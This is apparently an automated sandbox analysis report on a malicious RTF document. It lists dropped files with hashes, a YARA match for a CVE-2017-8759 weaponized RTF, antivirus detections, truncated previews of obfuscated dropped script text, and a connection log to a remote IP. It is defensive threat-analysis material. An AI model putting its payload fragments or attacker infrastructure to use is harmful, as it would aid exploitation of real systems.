            SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
            MD5:838C1F472806CF4BA2A9EC49C27C2847
            SHA1:D1C63579585C4740956B099697C74AD3E7C89751
            SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
            SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
            Malicious:false
            Reputation:moderate, very likely benign file
            Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):64
            Entropy (8bit):0.34726597513537405
            Encrypted:false
            SSDEEP:3:Nlll:Nll
            MD5:446DD1CF97EABA21CF14D03AEBC79F27
            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
            Malicious:false
            Reputation:high, very likely benign file
            Preview:@...e...........................................................
            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
            Category:dropped
            Size (bytes):370118
            Entropy (8bit):3.7476549797274865
            Encrypted:false
            SSDEEP:6144:zBUyYxye8Lmw8IHY0IFE7D0p5K8Jf2ET0pWjWGadCGqImRtJo6rVHVw:zBUymyvLmhJE7D0nK8Jf2ET0DddCD39W
            MD5:6BF7E3A363A42946DCFADDBEE84CF011
            SHA1:8F87B0475BDD4620DE94053D8C8EF997B2163A38
            SHA-256:3FC168DAC019BD38C78FD3550DF4A0E587E93592EFD92A63E847CDA26211839C
            SHA-512:910E6D2B2C09C0EE62C6BD8D21AABFE42B2A5EC0C2134052DDFE70CCDCBC424CE36D966668A2694AE43CB866FC63FD0A5C4E6A9E09EAE14A0EB3F740398A379B
            Malicious:false
            Reputation:low
            Preview:..g.f.f.m.Q.K.z.p.A.K.W.U.G.P.W.W.e.W.L.L.U.k.N.Z.L.z.U.S.m.d.e.r.o.p.A.b.k.c.b.o.B.q.f.I.l.B. .=. .".e.Q.h.b.G.b.b.H.B.v.l.U.W.p.i.o.L.L.W.n.i.p.G.W.B.m.Q.W.G.o.d.o.z.q.i.L.P.a.q.G.o.r.k.W.x.x.".....J.W.L.G.v.N.c.A.e.T.L.L.o.G.K.W.N.K.m.U.b.K.f.i.L.d.J.S.L.x.L.z.P.K.x.r.I.O.W.L.N.Q.L.A.c.U. .=. .".m.f.s.R.m.P.G.T.c.i.U.e.J.W.L.h.P.C.U.G.S.K.U.k.m.d.b.G.p.f.W.b.L.U.z.L.K.c.z.h.q.B.h.e.e.a.".....u.N.h.W.N.K.h.h.h.z.K.h.N.G.u.G.U.L.P.d.z.B.C.c.r.K.O.o.U.J.Z.B.f.s.A.K.O.z.P.N.d.t.k.l.U.B. .=. .".W.L.i.W.W.o.p.e.I.P.G.P.l.W.t.K.i.C.N.h.c.G.G.L.c.p.W.m.J.L.L.H.P.T.P.t.C.N.K.Z.g.i.x.k.W.t.".....f.p.W.x.N.z.n.K.L.p.q.d.e.J.m.g.s.W.W.o.J.W.K.u.i.u.W.c.a.L.f.K.f.c.k.P.N.g.x.e.U.W.f.l.l.f. .=. .".T.z.K.k.N.O.T.q.W.Q.l.G.x.L.b.j.f.i.c.Z.n.f.K.W.P.i.L.L.Z.b.L.x.o.f.x.c.f.p.Z.C.H.L.T.W.H.f.".....c.L.L.o.p.A.R.L.s.W.k.v.L.L.f.l.C.H.m.O.b.A.K.c.x.Q.z.m.B.m.L.U.T.K.G.G.a.e.x.J.l.d.T.b.l.O. .=. .".z.L.i.R.P.J.i.k.K.Z.L.a.m.L.z.C.n.P.a.h.c.W.A.P.g.N.S.B.L.t.L.W.m.m.U.u.W.L.R.i.W.L.h.z.B.h.".....e.e.c.t.
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Composite Document File V2 Document, Cannot read section info
            Category:dropped
            Size (bytes):8192
            Entropy (8bit):4.998237986577867
            Encrypted:false
            SSDEEP:96:JWkO5JMPrHV6OoIZ8SIAo+8lz5ocZBBMPbHVzOoIZ8SIAo+8lz5ocZ:JW5IPLV6VIZ8Fll19aPbVzVIZ8Fll19
            MD5:A4ECB570BE96099DEC0C849012FA35BF
            SHA1:D35FCECADED4037F083E2BE3D9199FAA988F8C9C
            SHA-256:ECEA210BA36F02D16ED96A40579D541E9CA13916539178B5A1E9D705265A3B16
            SHA-512:36828F4621C9FBC0244C74722D346BE20C7B11A5E14EDCA9B37B435084AF9DC751ADA49E30DBC6C1C6A8200CD85EFD86DC1F60C8C8EE4FA219069AD35570099A
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):12800
            Entropy (8bit):3.548662238097177
            Encrypted:false
            SSDEEP:384:y/1CD8oupo/jIaSje5yikgZ7MYqRhw2mYaCRn5BZ:wCwwUS5RtAnRTmLMBZ
            MD5:BC937C703F65B5ED1D7FB81D64EC6AA2
            SHA1:40020591C1238EF3922565B80055F71BA28744EA
            SHA-256:1A62A9AFBDAA44437702A8879416F0E2904481965248879094D9D287868B0A22
            SHA-512:DEFA71A46589359A79DCAA5579A3FC8DBF3761AB9441AAB02B7B491EA39D3F3880252E05728075419969E0016F03D1157A60D13782FD8AE5B6DC09F367A7B5D0
            Malicious:false
            Preview:......1.4.2.9.2.8.5.5.0.4.[.0.9.3._.?.$.<.3.`.|...$...5.1.?...>...*.!.~.@.1.[.,.*.;.'.|.&.].9.?.2.4.~.-.!.&.!.@...].;.%.%.(.?.7.7.#.?.>.[.4.?.~.:.|.-...(.%.@.4.^.9.(.?...>...*.%.9...-.'.2.;./.....&.(...=.1.+.@.2.].@.*.1.;.|.!.~.8.5.0.)._.7.3.~.9.-.(.....1...?.=.+.@.$.5.%.7.9...#.6.0.?.%.4.4.6./.!.>./.?.:...8.1...,.&...'.?.&.=.?.:.)...%.^.7.,...!.=.5.?.^.>.^.5.]...8./.%.&.1.^.*.<.[.&.=.,.,.=.$.(...=.[.[.@.*.2.;...(.,.6.;.?.~._.8...1.#.8.~.%.+...?.0.7.,.?.&.4.0.?.#.&.(...(.>.[.:.7.>.7.].:.!.?.0.&.,...7.>...[.5.).?.:.9.+.).1...7.@.,.#.^.3.?.6.?.^.(.=.~.,.?.&.^.+.5.1.%._.[.'.`.9.?.!.).,.`.%.=...?.%./.`...&.9...|.=.!.6.?.(.6.:.,.*.'.3.%.7.*.?./.5./.?.~.?...<.5.(.8.`.`.?.*.[./.:.9.$...?...@.5.?.4.;.?.^.6.5.:.;.?.1...!.|...?.].%.<.8.?.~.'./.[...-.'._.`.8.[.?./.=.~.6.)...-.=.7.=.7.[...1.;.].>.;...0...3.&.@.8.[.5.=.2.:.#.0.'._.*...!.8.?.?.'.4.$.0.=...?.+...6.?.-.].).*.'.!.<.(...?.).'.%.`.<.#.?.9...$.6...8.`.%.$.%.[.2.?.[.-.#.=...3.?.:.(.`.?./.7.0.?.>...>.?.8.?.].(.2.].|.2.!.7.[.?.*...>.@.^.|...
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):1024
            Entropy (8bit):0.05390218305374581
            Encrypted:false
            SSDEEP:3:ol3lYdn:4Wn
            MD5:5D4D94EE7E06BBB0AF9584119797B23A
            SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
            SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
            SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
            Malicious:false
            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1
            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            File Type:very short file (no magic)
            Category:dropped
            Size (bytes):1
            Entropy (8bit):0.0
            Encrypted:false
            SSDEEP:3:U:U
            MD5:C4CA4238A0B923820DCC509A6F75849B
            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
            Malicious:false
            Preview:1
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:09 2023, mtime=Fri Aug 11 15:42:09 2023, atime=Sat Oct 5 11:49:37 2024, length=90316, window=hide
            Category:dropped
            Size (bytes):1014
            Entropy (8bit):4.5523142871624005
            Encrypted:false
            SSDEEP:12:80sFgXg/XAlCPCHaXjByB/qPX+WD6EWIgDkicvbkGe0ryJu4kDQDtZ3YilMMEpxz:8L/XTzw4wde3e0mJ/Dv3qw57u
            MD5:6501385D8E1B9B7C0730A37112D35AE6
            SHA1:D6980B591C048607761B55D134CBEEFEC69EBD73
            SHA-256:0B5A1C9B86034ED4A1CE0AAB103472956E11735E44CF31A5E74072998C665E59
            SHA-512:175C9AB5729256719EA607A80980F96356EA2AA0F1EF5E17776AD6CEFD742E3253B884E55614717E43F2C9534AE85D6B9F37825E657A0EC512A398CE24377B7E
            Malicious:false
            Preview:L..................F.... ......r......r.......%....`...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....EY1f..user.8......QK.XEY1f*...&=....U...............A.l.b.u.s.....z.1......WG...Desktop.d......QK.X.WG.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2..`..EY3f .IPEMBW~1.RTF..J.......WE..WE.*.........................I.p.E.m.B.W.3.Q.w.5...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\899552\Users.user\Desktop\IpEmBW3Qw5.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.I.p.E.m.B.W.3.Q.w.5...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......899552..........D_....3N...W...9..W.e8...8.....[D_....3N...W...9..W.e8
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Generic INItialization configuration [folders]
            Category:dropped
            Size (bytes):55
            Entropy (8bit):4.749452668030776
            Encrypted:false
            SSDEEP:3:HnKaE6YCm4YE6YCv:Hnrqbqs
            MD5:C7C5B9E1EED941C6EF56A1D68D0B80D8
            SHA1:03BC2418DF292FDE512517F1286DC664FA5517CF
            SHA-256:D51E1CB76C622C5AD4CFFC22A7F20D0CE534E290FC00424B912B7E3ACBB74A84
            SHA-512:5EACE66E381ACE6F17E3BE41B9524336AC6B59815181E3E6D96721F9F36A17E91A89CCE6CF5A0A91C836DE28B6A433923D482E945E832B38DCE10BB18608A59B
            Malicious:false
            Preview:[misc]..IpEmBW3Qw5.LNK=0..[folders]..IpEmBW3Qw5.LNK=0..
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):162
            Entropy (8bit):2.4797606462020307
            Encrypted:false
            SSDEEP:3:vrJlaCkWtVyvJlxOl0XklMWxsFlcFyldllln:vdsCkWtMJa2XkX29H/l
            MD5:9515925BA816A641DCF27861B720B5F4
            SHA1:7B2D4812894F9A0B739F14FE349D6779558C28F0
            SHA-256:1A89665A9EDBE5AEA1369DBB8B45AD1E110716EE3F038CEA03EFF296C48EC97D
            SHA-512:E0A543D1CE3F270F2B34847869780C951C98200C81274D33CD2486DDBD03910759BC369ECAC696B344399F903F44BC6ACAC40F845BBA1C5EDD5BF4E9B562E008
            Malicious:false
            Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
            Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
            Category:dropped
            Size (bytes):370118
            Entropy (8bit):3.7476549797274865
            Encrypted:false
            SSDEEP:6144:zBUyYxye8Lmw8IHY0IFE7D0p5K8Jf2ET0pWjWGadCGqImRtJo6rVHVw:zBUymyvLmhJE7D0nK8Jf2ET0DddCD39W
            MD5:6BF7E3A363A42946DCFADDBEE84CF011
            SHA1:8F87B0475BDD4620DE94053D8C8EF997B2163A38
            SHA-256:3FC168DAC019BD38C78FD3550DF4A0E587E93592EFD92A63E847CDA26211839C
            SHA-512:910E6D2B2C09C0EE62C6BD8D21AABFE42B2A5EC0C2134052DDFE70CCDCBC424CE36D966668A2694AE43CB866FC63FD0A5C4E6A9E09EAE14A0EB3F740398A379B
            Malicious:true
            Preview:..g.f.f.m.Q.K.z.p.A.K.W.U.G.P.W.W.e.W.L.L.U.k.N.Z.L.z.U.S.m.d.e.r.o.p.A.b.k.c.b.o.B.q.f.I.l.B. .=. .".e.Q.h.b.G.b.b.H.B.v.l.U.W.p.i.o.L.L.W.n.i.p.G.W.B.m.Q.W.G.o.d.o.z.q.i.L.P.a.q.G.o.r.k.W.x.x.".....J.W.L.G.v.N.c.A.e.T.L.L.o.G.K.W.N.K.m.U.b.K.f.i.L.d.J.S.L.x.L.z.P.K.x.r.I.O.W.L.N.Q.L.A.c.U. .=. .".m.f.s.R.m.P.G.T.c.i.U.e.J.W.L.h.P.C.U.G.S.K.U.k.m.d.b.G.p.f.W.b.L.U.z.L.K.c.z.h.q.B.h.e.e.a.".....u.N.h.W.N.K.h.h.h.z.K.h.N.G.u.G.U.L.P.d.z.B.C.c.r.K.O.o.U.J.Z.B.f.s.A.K.O.z.P.N.d.t.k.l.U.B. .=. .".W.L.i.W.W.o.p.e.I.P.G.P.l.W.t.K.i.C.N.h.c.G.G.L.c.p.W.m.J.L.L.H.P.T.P.t.C.N.K.Z.g.i.x.k.W.t.".....f.p.W.x.N.z.n.K.L.p.q.d.e.J.m.g.s.W.W.o.J.W.K.u.i.u.W.c.a.L.f.K.f.c.k.P.N.g.x.e.U.W.f.l.l.f. .=. .".T.z.K.k.N.O.T.q.W.Q.l.G.x.L.b.j.f.i.c.Z.n.f.K.W.P.i.L.L.Z.b.L.x.o.f.x.c.f.p.Z.C.H.L.T.W.H.f.".....c.L.L.o.p.A.R.L.s.W.k.v.L.L.f.l.C.H.m.O.b.A.K.c.x.Q.z.m.B.m.L.U.T.K.G.G.a.e.x.J.l.d.T.b.l.O. .=. .".z.L.i.R.P.J.i.k.K.Z.L.a.m.L.z.C.n.P.a.h.c.W.A.P.g.N.S.B.L.t.L.W.m.m.U.u.W.L.R.i.W.L.h.z.B.h.".....e.e.c.t.
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
            Category:dropped
            Size (bytes):50783
            Entropy (8bit):5.283608233145182
            Encrypted:false
            SSDEEP:384:323tHbrN79ozVzEFH3W8uHWxSQAy+JqdlaM9cmdGUVZZbaxo5b45vZBNfy7IBi64:323b3W8KQBdwM7GxoGv/N67I/hAZqCN
            MD5:E53D42EE5DD12F627D8D020DC9DBC642
            SHA1:5C5260D2E4DB170ED92A3111591EF1B105791AEF
            SHA-256:5C95691FBD5ABAE9CA49F3EFC337FABA32DEE2883D1D01BCBF1E60B731AE9487
            SHA-512:2693F517FD771E8F23822D5EE9BA013D60322158FB19EF70A404FBA15215FA846E6339EF00CAF34E89C2F9B18DF32DACA43538FC2080E70F812C247EE9AEF366
            Malicious:true
            Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:data
            Category:dropped
            Size (bytes):162
            Entropy (8bit):2.4797606462020307
            Encrypted:false
            SSDEEP:3:vrJlaCkWtVyvJlxOl0XklMWxsFlcFyldllln:vdsCkWtMJa2XkX29H/l
            MD5:9515925BA816A641DCF27861B720B5F4
            SHA1:7B2D4812894F9A0B739F14FE349D6779558C28F0
            SHA-256:1A89665A9EDBE5AEA1369DBB8B45AD1E110716EE3F038CEA03EFF296C48EC97D
            SHA-512:E0A543D1CE3F270F2B34847869780C951C98200C81274D33CD2486DDBD03910759BC369ECAC696B344399F903F44BC6ACAC40F845BBA1C5EDD5BF4E9B562E008
            Malicious:false
            Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
            Category:dropped
            Size (bytes):50783
            Entropy (8bit):5.283608233145182
            Encrypted:false
            SSDEEP:384:323tHbrN79ozVzEFH3W8uHWxSQAy+JqdlaM9cmdGUVZZbaxo5b45vZBNfy7IBi64:323b3W8KQBdwM7GxoGv/N67I/hAZqCN
            MD5:E53D42EE5DD12F627D8D020DC9DBC642
            SHA1:5C5260D2E4DB170ED92A3111591EF1B105791AEF
            SHA-256:5C95691FBD5ABAE9CA49F3EFC337FABA32DEE2883D1D01BCBF1E60B731AE9487
            SHA-512:2693F517FD771E8F23822D5EE9BA013D60322158FB19EF70A404FBA15215FA846E6339EF00CAF34E89C2F9B18DF32DACA43538FC2080E70F812C247EE9AEF366
            Malicious:true
            Yara Hits:
            • Rule: INDICATOR_RTF_EXPLOIT_CVE_2017_8759_2, Description: detects CVE-2017-8759 weaponized RTF documents., Source: C:\Users\user\Desktop\~WRD0000.tmp, Author: ditekSHen
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi31507\deflang1033\deflangfe1033\themelang1033\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New
            Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            File Type:ASCII text, with CRLF line terminators
            Category:modified
            Size (bytes):26
            Entropy (8bit):3.95006375643621
            Encrypted:false
            SSDEEP:3:ggPYV:rPYV
            MD5:187F488E27DB4AF347237FE461A079AD
            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
            Malicious:true
            Preview:[ZoneTransfer]....ZoneId=0
            File type:Rich Text Format data, version 1
            Entropy (8bit):2.5544149848916957
            TrID:
            • Rich Text Format (5005/1) 55.56%
            • Rich Text Format (4004/1) 44.44%
            File name:IpEmBW3Qw5.rtf
            File size:90'316 bytes
            MD5:85bb9c92d8128e3c8cf070a813b9ba82
            SHA1:cc187bf0c745ccd7fb932faa2ee030bb404ab1eb
            SHA256:71e0b0884fbf2ba2f8c52e90ae66f5be792d6b1f67d4ef86226958cc0bba3970
            SHA512:2ec2e947e54a9176428a6148c9b29ca91008297901239d46cc2d406bde4c7fa6ef8222bfa884521a78751a59be683675584d5abfe105aa155753f84c01f94ad1
            SSDEEP:384:dqmfGJq1ckXf9D/hZLmjToGIy/ysPF6bHbBJxNixXgkajNKAF:doJIP9D/hZLm4GNasS7B7NiJOjNKAF
            TLSH:3C934749D38F41A0CF456373931A4A4815FDB33EB70928B670AC93713BEDC2E46AA579
            File Content Preview:{\rtf1........{\*\userinfo986324663 \=}.{\61429285504[093_?$<3`|.$.51?.>.*!~@1[,*;'|&]9?24~-!&!@.];%%(?77#?>[4?~:|-.(%@4^9(?.>.*%9.-'2;/..&(.=1+@2]@*1;|!~850)_73~9-(..1.?=+@$5%79.#60?%446/!>/?:.81.,&.'?&=?:).%^7,.!=5?^>^5].8/%&1^*<[&=,,=$(.=[[@*2;.(,6;?~_
            Icon Hash:2764a3aaaeb7bdbf
            IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
            000001781hno
            TimestampSource PortDest PortSource IPDest IP
            Oct 5, 2024 14:49:42.426886082 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:42.431953907 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.432054996 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:42.432267904 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:42.437104940 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.899832964 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.899862051 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.899874926 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.899893045 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.899905920 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:42.899909019 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.899925947 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.899961948 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:42.899961948 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:42.899971962 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:42.900008917 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.900023937 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.900038004 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.900073051 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:42.900230885 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.900280952 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:42.904881001 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.904942989 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:42.905016899 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.905062914 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:42.905100107 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.905155897 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:42.986942053 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.986958981 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.987041950 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.987052917 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.987065077 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.987071991 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.987166882 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:42.987184048 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.987196922 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.987221956 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:42.987260103 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:42.988081932 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.988094091 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.988106966 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.988121033 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.988149881 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:42.988164902 CEST4916380192.168.2.22192.3.220.20
            Oct 5, 2024 14:49:42.988480091 CEST8049163192.3.220.20192.168.2.22
            Oct 5, 2024 14:49:42.988501072 CEST8049163192.3.220.20192.168.2.22
